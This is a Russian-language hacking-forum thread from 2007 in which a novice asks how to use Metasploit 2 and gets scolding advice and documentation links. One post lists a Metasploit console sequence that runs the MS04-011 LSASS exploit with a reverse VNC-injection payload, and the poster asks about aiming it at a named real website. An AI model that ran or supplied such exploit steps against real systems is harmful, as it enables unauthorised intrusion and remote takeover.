Просмотр полной версии : Metasploit 2
Братцы, помогите раздуплится над парами вопросов, связанных с этой прогой...
1. Когда настраиваю его на сервак: пишет, что-то там handler..... потом вырубается, вроде как бы ничего не нашел?? это так и надо, или я чего-то не так сделал???
2. Любой эксплоит с payloads идущий с ним прицепом канают на любой сервак или нужно учитывать еще какие-нибудь особенности.
Спасибо за помощь...
3. Цель нужно указывать конкретную, типа http://forum.antichat.ru/newthread.php?do=newthread&f=30 или можно просто http://antichat.ru
Заранее спасибо!
MegaBits
05.02.2007, 22:38
А причем Статьи???
Если честно, из твоей сумбурной речи мало чего понял. Учись четко описывать то, что хочешь сказать - и люди к тебе потянутся)
хоть и не в том форуме, еще и минус тебе влепили )
1) Ты вообще какую уязвимость используешь?
2) Эксплойты канают к определеннуму софту. И серваки тут ни при чем. Я могу ошибаться, но payloads - это вроде не сплоеты, а шеллкоды. Что это такое юзай гугл
3) все зависит от кокретного эксплоета. И адрес типа http://... может быть вообще ни причем.
Вывод: рано тебе юзать metasploit и вообще сплоеты. Не понимаешь нифига!
P.S.Используй гугл - я видел как минимум 3 статьи, где описывается как пользоваться метасплоетом. Кроме того - на этом форуме есть такая статья. Используй поиск по форуму со словами "wmf" или "wmf уязвимость". Сам придумай короче. И главный сюрприз для тебя:на video.antichat.ru есть видео, где показано как использовать wmf-уязвимость через метасплоет. И еще - прежде чем пользоваться сплоетами, потрудись хотя бы узнать что это.
Спасибо хотя бы за просвящение... Буду стараться
Вот так попробую спросить, вроде получилось конкретно и в тему...
Юзанье Metasploit
--msf > use lsass_ms04_011
--msf lsass_ms04_011 > set RHOST (сюда писать www.2day.kz или www.forum.2day.kz???)
--RHOST -> some.vuln.host
--msf lsass_ms04_011 > set PAYLOAD win32_reverse_vncinject
--PAYLOAD -> win32_reverse_vncinject
--msf lsass_ms04_011(win32_reverse_vncinject) > set LHOST your.own.ip
--LHOST -> your.own.ip
--msf lsass_ms04_011(win32_reverse_vncinject) > set LPORT (какой порт писать???)
--LPORT -> 4321
--msf lsass_ms04_011(win32_reverse_vncinject) > exploit
Офф сайт
http://metasploit.org/projects/Framework/documentation.html
Вот по-русски
http://www.securitylab.ru/analytics/216372.php
http://www.securitylab.ru/analytics/216369.php
есть еще и pdf.
-=lebed=-
08.02.2007, 13:16
Вообще-то в "Похожих темах" есть все мои статьи, но если лень кликать там, то можно кликнуть в подписи на цифры...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot